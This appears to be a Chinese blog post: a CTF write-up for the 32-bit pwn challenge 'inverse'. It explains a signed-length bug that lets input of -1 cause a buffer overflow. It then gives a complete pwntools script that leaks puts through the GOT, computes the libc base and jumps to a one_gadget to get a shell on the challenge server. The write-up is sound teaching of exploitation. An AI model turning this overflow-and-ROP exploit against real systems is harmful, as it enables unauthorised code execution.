-
HWS-CTF-第七期山大站-inverse
第一次真正意义上独立在比赛中做出题目来了,距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改,交flag稍微晚了些(我太菜了)inverse
main
work
这里很明显发现符号转换的bug,即nbytes对应有符号数为-1时可以造成溢出read_int
将输入的字符转换为int类型(字符为负数也会转换)
read_n
往字符数组输入字符
思路
onegadget
ROPgadget
首先patchelf换库
然后通过输入字符-1使得绕过检查,随后-1对应0xffffffff(32位),再次read时造成溢出,构造payload,先将返回地址覆盖为puts函数的地址,然后下一个为work函数的地址(puts的返回地址),然后是puts的参数,为puts的got表的地址,然后第一次work造成puts地址泄露,(先通过one_gadget找到可用的gadget,最后选择0x6749f的,因为esi一般都是符合其要求的,然后eax比较好找对应的gadget,如上图)从而得到libc基地址,然后第二次work时同样输入字符-1,随后将返回地址覆盖为pop eax;ret的gadget的地址,然后是0,最后是onegadget的地址,最后成功getshellexp
from pwn import* #context(os="linux",arch="i386",log_level="debug") s=remote("124.71.135.126",30043) #s=process("./pwn") f=ELF("./pwn") libc=ELF("./libc-2.27.so") #gdb.attach(s,"b main") s.recvuntil(b"input world tag: ") s.sendline(b"1") s.sendline(b"-1") s.recvuntil(b"leave me a msg:") payload=b"a"*64+p32(f.sym["puts"])+p32(f.sym["work"])+p32(f.got["puts"]) #+f.got["puts"] s.sendline(payload) put_addr=u32(s.recvline()[0:4]) libc_base=put_addr-libc.sym["puts"] system_addr=libc_base+0x6749f payload=b"a"*64+p32(0x00024d37+libc_base)+p32(0)+p32(system_addr) s.sendline(b"-1") s.recvuntil(b"leave me a msg:") s.sendline(payload) # print(hex(u32(put_addr))) s.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
-
相关阅读:
pat basic 1095 解码PAT准考证
Selenium结合JMeter进行自动化性能测试
了解如何使用 Node.js 构建微服务
高斯分布的乘积与卷积
CATIA Composer软件安装包分享(附安装教程)
python基本语法
神经网络需要的数学知识,神经网络的数学基础
java中循环遍历某个文件夹下面的文件,不压缩自身的文件夹,然后压缩成tar.gz格式,压缩失败报异常,代码类编写?
【深蓝学院】手写VIO第2章--IMU传感器--作业
05_openstack之Neutron网络管理
- 原文地址:https://blog.csdn.net/llovewuzhengzi/article/details/134496650